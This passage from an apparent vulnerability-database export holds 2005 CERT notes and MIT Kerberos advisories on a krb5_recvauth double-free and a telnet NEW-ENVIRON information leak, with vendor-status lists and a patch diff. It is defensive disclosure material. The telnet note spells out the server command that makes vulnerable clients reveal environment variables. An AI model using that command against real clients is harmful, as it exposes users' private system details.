\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Hitachi __ Not Affected\n\nNotified: May 10, 2005 Updated: July 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNOT VULNERABLE\n\nHitachi HI-UX/WE2 is NOT Vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks' products do not employ Kerberos in any configuration. Juniper's products are not subject to exploitation via the vulnerability in the MIT krb5 software described in VU#623332.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Microsoft Corporation __ Not Affected\n\nNotified: June 06, 2005 Updated: June 06, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nAt this point, we have determined that there are no Microsoft products affected by this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Netfilter __ Not Affected\n\nNotified: June 06, 2005 Updated: June 09, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nnetfilter/iptables does not implement kerberos and is therefore not affected.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### WatchGuard __ Not Affected\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWatchGuard believes that it is not affected by this vulnerability. If you have further questions about this or any other security concern with WatchGuard products, please contact:\n\nSteve Fallin \nDirector, Rapid Response Team \nWatchGuard Technologies \n<http://www.watchguard.com> \nsteve.fallin@watchguard.com \n+1.206.521.8340\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Apple Computer Inc. __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Connectiva __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Cray Inc. __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Debian __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### EMC Corporation __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Engarde __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### FreeBSD __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Fujitsu __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### HP __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### IBM __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Immunix __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Ingrian Networks __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### KTH Kerberos __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Mandriva Inc. __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### MontaVista Software __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### NEC Corporation __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### NetBSD __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Nokia __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Novell __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### OpenBSD __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Openwall GNU/*/Linux __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### QNX __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### SCO __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### SGI __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Sequent __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Sony Corporation __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### SuSE Inc. __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### TurboLinux __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Unisys __ Unknown\n\nNotified: June 06, 2005 Updated: July 12, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\n### Wind River Systems __ Unknown\n\nNotified: June 06, 2005 Updated: August 08, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nWe have no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23623332 Feedback>).\n\nView all 41 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n<http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2005-003-recvauth.txt>\n\n### Acknowledgements\n\nThis vulnerability was reported by the MIT Kerberos Development Team. The MIT Kerberos Development Team thanks Magnus Hagander for reporting this vulnerability.\n\nThis document was written by Robert Mead based on information in the MIT krb5 Security Advisory 2005-003.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-1689](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-1689>) \n---|--- \n**Severity Metric:** | 13.01 \n**Date Public:** | 2005-07-12 \n**Date First Published:** | 2005-07-13 \n**Date Last Updated: ** | 2005-08-08 19:18 UTC \n**Document Revision: ** | 26 \n", "modified": "2005-08-08T19:18:00", "published": "2005-07-13T00:00:00", "id": "VU:623332", "href": "https://www.kb.cert.org/vuls/id/623332", "type": "cert", "title": "MIT Kerberos 5 contains double free vulnerability in \"krb5_recvauth()\" function", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T20:43:27", "bulletinFamily": "info", "cvelist": ["CVE-2005-0488", "CVE-2005-1205"], "description": "### Overview \n\nA vulnerability in the handling of the NEW-ENVIRON command allows a malicious telnet server to gain information from a client's environment variables.\n\n### Description \n\nThe Telnet network protocol is described in [RFC854](<http://www.apps.ietf.org/rfc/rfc854.html>) and [RFC855](<http://www.apps.ietf.org/rfc/rfc855.html>) as a general, bi-directional communications facility. The Telnet protocol is commonly used for command-line login sessions between Internet hosts.\n\nThe vulnerability is in the NEW-ENVIRON sub-command that is the mechanism to used for passing environment information between a telnet client and server. Use of this mechanism enables a telnet user to propagate configuration information to a remote host when connecting. Please see [RFC1572](<http://www.apps.ietf.org/rfc/rfc1572.html>) for more information. As specified in section 3 of RFC1572 the expected default behavior should be \"that there will not be any exchange of environment information\". \n \nIn order to exploit this vulnerability, a malicious server can send a connected client the following telnet command: \n \n`SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE \n` \nVulnerable telnet clients will send the value of the referenced environment variable. Environment variables may contain a variety of the information such as local username, executable file search paths, locations of sensitive data, and other potentially sensitive information about the client computer. \n \nPlease note telnet functionality has been embedded in many applications and not just underlying operating systems distributions. \n \nThe [iDefense Security Advisory](<http://www.idefense.com/application/poi/display?id=260>) contains additional information about affected and unaffected vendors. \n \n--- \n \n### Impact \n\nAn attacker may be able to gather information about remote systems and users who connect to attackers malicious telnet server. An attacker would have to trick a victim into initiating a telnet connection using a vulnerable client. This may be accomplished with an HTML rendered email or web page, using the TELNET:// URI handler, however further user interaction may be required. \n \n--- \n \n### Solution \n\n**Apply an update from your vendor**\n\nPatches, updates, and fixes should be available from multiple vendors. \n \n--- \n \n \n**Workarounds** \nDisable access to telnet, limit the use of telnet to trusted sites and/or encourage the use more secure remote connection clients. \n \nOn Unix systems it might be viable to remove execute permission from telnet and other binaries that perform telnet. \n \nOn Windows systems changing or removing the registry key entry: HKEY_CLASSES_ROOT\\telnet\\shell\\open\\command \nshould reduce the likelihood of successful automatic exploitation attempts such as those using telnet URLs. \n \nNote these workarounds do not address the underlying vulnerability. \n \n--- \n \n### Vendor Information\n\n800829\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: June 14, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft has issued patches in relation to this vulnerability, for more information see Microsoft Security Bulletin MS05-033:\n\n<http://www.microsoft.com/technet/security/bulletin/MS05-033.mspx>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23800829 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nUpdated: July 28, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVendor Statement: Red Hat, Inc\n\nUpdates are available for Red Hat Enterprise Linux 2.1, 3 and 4 to correct \nthis issue. New telnet and Kerberos packages along with our advisory are \navailable at the URL below and by using the Red Hat Network 'up2date' tool. \n \n<http://rhn.redhat.com/errata/CAN-2005-0488.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRed Hat Inc. has released a security update in relation to this issue: \n<https://rhn.redhat.com/errata/RHSA-2005-504.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23800829 Feedback>).\n\n### Sun Microsystems Inc. __ Affected\n\nUpdated: June 14, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSun Microsystems have issued two Sun(sm) Alert Notifications in relation to this vulnerability including workaround and patch information. For more information please see:\n\n<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57755-1> \n<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1> \n\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23800829 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.idefense.com/application/poi/display?id=260>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0488>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1205>\n * <http://www.apps.ietf.org/rfc/rfc1572.html>\n * <http://www.securityfocus.com/archive/1/402230>\n\n### Acknowledgements\n\nGa\u00ebl Delalleau is credited with this discovery. Thank you to iDefense for coordinating the release of information about this issue.\n\nThis document was written by Robert Mead based on information in the iDEFENSE Security Advisory\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-0488](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-0488>) \n---|--- \n**Severity Metric:** | 0.17 \n**Date Public:** | 2005-06-14 \n**Date First Published:** | 2005-06-14 \n**Date Last Updated: ** | 2005-07-28 21:05 UTC \n**Document Revision: ** | 23 \n", "modified": "2005-07-28T21:05:00", "published": "2005-06-14T00:00:00", "id": "VU:800829", "href": "https://www.kb.cert.org/vuls/id/800829", "type": "cert", "title": "Telnet Client Information Disclosure Vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-1689"], "description": " MIT krb5 Security Advisory 2005-003\r\n\r\nOriginal release: 2005-07-12\r\n\r\nTopic: double-free in krb5_recvauth\r\n\r\nSeverity: CRITICAL\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe krb5_recvauth&#40;&#41; function can free previously freed memory under\r\nsome error conditions. This vulnerability may allow an\r\nunauthenticated remote attacker to execute arbitrary code.\r\nExploitation of this vulnerability on a Kerberos Key Distribution\r\nCenter &#40;KDC&#41; host can result in compromise of an entire Kerberos\r\nrealm. No exploit code is known to exist at this time. Exploitation\r\nof double-free vulnerabilities is believed to be difficult.\r\n[CAN-2005-1689, VU#623332]\r\n\r\nIMPACT\r\n======\r\n\r\nAn unauthenticated attacker may be able to execute arbitrary code in\r\nthe context of a program calling krb5_recvauth&#40;&#41;. This includes the\r\nkpropd program which typically runs on slave Key Distribution Center\r\n&#40;KDC&#41; hosts, potentially leading to compromise of an entire Kerberos\r\nrealm. Other vulnerable programs which call krb5_recvauth&#40;&#41; are\r\nusually remote login programs running with root privileges.\r\nUnsuccessful attempts at exploitation may result in denial of service\r\nby crashing the target program.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* The kpropd daemon in all releases of MIT krb5, up to and including\r\n krb5-1.4.1, is vulnerable.\r\n\r\n* The klogind and krshd remote-login daemons in all releases of MIT\r\n krb5, up to and including krb5-1.4.1, is vulnerable.\r\n\r\n* Third-party application programs which call krb5-recvauth&#40;&#41; are also\r\n vulnerable.\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.4.2 release will have a fix for this\r\n vulnerability.\r\n\r\n* Apply the following patch. This patch was generated against the\r\n krb5-1.4.1 release. It may apply, with some offset, to earlier\r\n releases.\r\n\r\n The patch may also be found at:\r\n\r\n http://web.mit.edu/kerberos/advisories/2005-003-patch_1.4.1.txt\r\n\r\n The associated detached PGP signature is at:\r\n\r\n http://web.mit.edu/kerberos/advisories/2005-003-patch_1.4.1.txt.asc\r\n\r\nIndex: lib/krb5/krb/recvauth.c\r\n===================================================================\r\nRCS file: /cvs/krbdev/krb5/src/lib/krb5/krb/recvauth.c,v\r\nretrieving revision 5.38\r\ndiff -c -r5.38 recvauth.c\r\n*** lib/krb5/krb/recvauth.c 3 Sep 2002 01:13:47 -0000 5.38\r\n--- lib/krb5/krb/recvauth.c 23 May 2005 23:19:15 -0000\r\n***************\r\n*** 76,82 ****\r\n if &#40;&#40;retval = krb5_read_message&#40;context, fd, &amp;inbuf&#41;&#41;&#41;\r\n return&#40;retval&#41;;\r\n if &#40;strcmp&#40;inbuf.data, sendauth_version&#41;&#41; {\r\n- krb5_xfree&#40;inbuf.data&#41;;\r\n problem = KRB5_SENDAUTH_BADAUTHVERS;\r\n }\r\n krb5_xfree&#40;inbuf.data&#41;;\r\n--- 76,81 ----\r\n***************\r\n*** 90,96 ****\r\n if &#40;&#40;retval = krb5_read_message&#40;context, fd, &amp;inbuf&#41;&#41;&#41;\r\n return&#40;retval&#41;;\r\n if &#40;appl_version &amp;&amp; strcmp&#40;inbuf.data, appl_version&#41;&#41; {\r\n- krb5_xfree&#40;inbuf.data&#41;;\r\n if &#40;!problem&#41;\r\n problem = KRB5_SENDAUTH_BADAPPLVERS;\r\n }\r\n--- 89,94 ----\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CAN-2005-1689\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1689\r\n\r\nCERT: VU#623332\r\nhttp://www.kb.cert.org/vuls/id/623332\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThanks to Magnus Hagander for reporting this vulnerability.\r\n\r\nDETAILS\r\n=======\r\n\r\nThe helper function revcauth_common&#40;&#41; in lib/krb5/krb/recvauth.c has\r\ntwo locations which call krb5_read_message&#40;&#41;, followed by an\r\nunconditional krb5_xfree&#40;&#41; of the buffer allocated by\r\nkrb5_read_message&#40;&#41;. In the cases where the sendauth version string\r\nor the application version string do not match the expected value,\r\nrecvauth_common&#40;&#41; performs a krb5_xfree&#40;&#41; on the buffer allocated by\r\nkrb5_read_message&#40;&#41; preceding the subsequent unconditional call to\r\nkrb5_xfree&#40;&#41; on the same buffer.\r\n\r\nSince the code paths which call krb5_xfree&#40;&#41; twice do so with almost\r\nno intervening code, exploitation of this vulnerability may be more\r\ndifficult than exploitation of other double-free vulnerabilities. No\r\ndetailed analysis has been performed on the ease of exploitation.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2005-05-12 original release\r\n\r\nCopyright &#40;C&#41; 2005 Massachusetts Institute of Technology", "edition": 1, "modified": "2005-07-13T00:00:00", "published": "2005-07-13T00:00:00", "id": "SECURITYVULNS:DOC:9150", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9150", "title": "MITKRB5-SA-2005-003: double-free in krb5_recvauth", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-1174", "CVE-2005-1175"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n MIT krb5 Security Advisory 2005-002\r\n\r\nOriginal release: 2005-07-12\r\n\r\nTopic: buffer overflow, heap corruption in KDC\r\n\r\nSeverity: CRITICAL\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe MIT krb5 Key Distribution Center &#40;KDC&#41; implementation can corrupt\r\nthe heap by attempting to free memory at a random address when it\r\nreceives a certain unlikely &#40;but valid&#41; request via a TCP connection.\r\nThis attempt to free unallocated memory can result in a KDC crash and\r\nconsequent denial of service. [CAN-2005-1174, VU#259798]\r\n\r\nAdditionally, the same request, when received by the KDC via either\r\nTCP or UDP, can trigger a bug in the krb5 library which results in a\r\nsingle-byte overflow of a heap buffer. Application servers are\r\nvulnerable to a highly improbable attack, provided that the attacker\r\ncontrols a realm sharing a cross-realm key with the target\r\nrealm. [CAN-2005-1175, VU#885830]\r\n\r\nAn unauthenticated attacker may be able to use these vulnerabilities\r\nto execute arbitrary code on the KDC host, potentially compromising an\r\nentire Kerberos realm. No exploit code is known to exist at this\r\ntime. Exploitation of these vulnerabilities is believed to be\r\ndifficult.\r\n\r\nIMPACT\r\n======\r\n\r\nAn unauthenticated attacker may be able to execute arbitrary code on\r\nthe KDC host, potentially compromising an entire Kerberos realm. An\r\nunsuccessful attack against the heap corruption vulnerability may\r\nresult in a denial of service by crashing the KDC process.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* [CAN-2005-1174] affects the KDC implementation in all MIT krb5\r\n releases supporting TCP client connections to the KDC. This\r\n includes krb5-1.3 and later releases, up to and including\r\n krb5-1.4.1.\r\n\r\n* [CAN-2005-1175] affects KDC implementations and application servers\r\n 